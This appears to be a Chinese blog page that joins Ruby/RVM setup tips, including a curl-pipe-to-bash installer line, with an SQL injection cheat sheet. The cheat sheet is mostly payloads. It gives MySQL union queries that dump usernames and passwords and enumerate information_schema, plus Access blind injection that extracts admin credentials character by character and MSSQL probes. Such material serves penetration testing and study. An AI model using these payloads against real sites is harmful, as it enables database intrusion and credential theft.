安装gem的时候会默认安装相应gem的doc,如果不想占用空间安装doc,则gem install XXX –no-doc 即可。
使用下列命令可以启动gem自带的文档:

1
gem server --port 1234

然后访问http://localhost:1234就可以查看相关的gem文档。

5.ruby改变控制台输出内容的颜色

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
puts "\033[1m前景色\033[0m\n"  
puts "   \033[30mBlack (30)\033[0m\n"  
puts "   \033[31mRed (31)\033[0m\n"  
puts "   \033[32mGreen (32)\033[0m\n"  
puts "   \033[33mYellow (33)\033[0m\n"  
puts "   \033[34mBlue (34)\033[0m\n"  
puts "   \033[35mMagenta (35)\033[0m\n"  
puts "   \033[36mCyan (36)\033[0m\n"  
puts "   \033[37mWhite (37)\033[0m\n"  
puts ''   
puts "\033[1m背景色\033[0m\n"  
puts "   \033[40m\033[37mBlack (40), White Text\033[0m\n"  
puts "   \033[41mRed (41)\033[0m\n"  
puts "   \033[42mGreen (42)\033[0m\n"  
puts "   \033[43mYellow (43)\033[0m\n"  
puts "   \033[44mBlue (44)\033[0m\n"  
puts "   \033[45mMagenta (45)\033[0m\n"  
puts "   \033[46mCyan (46)\033[0m\n"  
puts "   \033[47mWhite (47)\033[0m\n"  
puts ''  
puts "\033[1m其他\033[0m\n"  
puts "   Reset (0)"  
puts "   \033[1mBold (1)\033[0m\n"  
puts "   \033[4mUnderlined (4)\033[0m\n"

colors

6.一些比较特别的包

Ruby json gem
https://rubygems.global.ssl.fastly.net/gems/json-1.8.3.gem
树莓派wiringpi gpio包
http://pi.gadgetoid.com/article/wiringpi-as-a-ruby-gem

7.安装rvm的正确姿势

参考自:http://rvm.io/rvm/install
首先添加gpg公钥:

1
gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3

安装稳定版本的rvm

1
curl -sSL https://get.rvm.io | bash -s stable --ruby

8.解决kali2.0中RVM不能编译ruby-2.3.3

  • 错误详情:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    ruby-2.3.3 - #compiling.......................................................................-
    Error running '__rvm_make -j4',
    showing last 15 lines of /usr/local/rvm/log/1488041042_ruby-2.3.3/make.log
    exts.mk:210: recipe for target 'ext/openssl/all' failed
    make[1]: *** [ext/openssl/all] Error 2
    make[1]: *** Waiting for unfinished jobs....
    installing default nkf libraries
    compiling objspace_dump.c
    linking shared-object json/ext/generator.so
    make[2]: Leaving directory '/usr/local/rvm/src/ruby-2.3.3/ext/json/generator'
    linking shared-object objspace.so
    make[2]: Leaving directory '/usr/local/rvm/src/ruby-2.3.3/ext/objspace'
    linking shared-object nkf.so
    make[2]: Leaving directory '/usr/local/rvm/src/ruby-2.3.3/ext/nkf'
    make[1]: Leaving directory '/usr/local/rvm/src/ruby-2.3.3'
    uncommon.mk:203: recipe for target 'build-ext' failed
    make: *** [build-ext] Error 2
    ++ return 2
    There has been an error while running make. Halting the installation.

查看/usr/local/rvm/log/1488041042_ruby-2.3.3/make.log发现是openssl版本过老导致的。

  • 解决:
    第一步:先安装用于rvm的openssl:
    1
    rvm pkg install openssl

第二步:编译安装ruby,指定openssl目录(我的是/usr/local/rvm/usr/)

1
rvm install ruby-2.3.3 --with-openssl-dir=/usr/local/rvm/usr/

9.设置Gems默认源为ruby-china

现在没有淘宝源了,只有ruby-china源

1
gem sources --add https://gems.ruby-china.org/ --remove https://rubygems.org/

设置Bundler默认源为ruby-china:

1
bundle config mirror.https://rubygems.org https://gems.ruby-china.org

这样修改以后,即使Gemfile中指定了Source,也会用国内的源。

安全技术 3 分钟 读完 (约 428 字)

MYSQL篇
1.内置函数和变量 

1
@@datadir,version(),database(),user(),load_file(),outfile()

2.利用concat(),group_concat(),concat_ws()拼接查询结果
实例:

1
2
xxx.php?id=1 and 1=2 union select 1,
group_concat(username,0x3a,password),3 from user

3.使用内建数据库查询表段和字段
查表段: 

1
2
3
xxx.php?id=1 and 1=2 union select 1,2,table_name from 
(select * from information_schema.tables where table_schema=数据库名的hex 
order by table_schema limit 0,1)t limit 1–

查字段: 

1
2
3
xxx.php?id=1 and 1=2 union select 1,2,column_name from 
(select * from information_schema.columns where table_name=表名的hex 
and table_schema=数据库名hex值 order by 1 limit 1,1)t limit 1–

这里可以再结合下concat的拼接功能 

1
2
3
4
xxx.php?id=1 and 1=2 union select 1,2,group_concat(column_name,0x20) 
from (select * from information_schema.columns where table_name=表名的hex 
and table_schema=数据库名hex值 order by 1 limit 0,n)t limit 1– 
[n表示第n条数据]

Access篇

猜表名

1
*.asp?id=1 and exists (select * from admin)

猜列名

1
*.asp?id=1 and exists (select password from admin)

Order by查询

1
*.asp?id=1 order by 3

union 查询

1
*.asp?id=1 union select 1,password,3 from admin

不支持union的情况
先判断内容的长度

1
*.asp?id=132 and (select top 1 len(user) from admin) >5

然后一个一个猜

1
*.asp?id=132 and (select top 1 asc(mid(user,1,1)) from admin)>97

例如确定asc(mid(user,1,1))的值是97,即可判断出user的第一个字符为a
确定了之后继续从第二个位置猜

1
*.asp?id=132 and (select top 1 asc(mid(user,2,1)) from admin)>97

以此类推

MSSQL篇
基于报错的MSSQL注入:
判断是否是MSSQL

1
'and exists (select * from sysobjects) --

如果返回正常,就说明是MSSQL,否则当sysobjects不存在,是会报错的。

猜表名:

1
'and exists(select * from admin)--

如果存在,会返回正常页面,否则报错,就是不存在。

Your browser is out-of-date!

Update your browser to view this website correctly. Update my browser now

×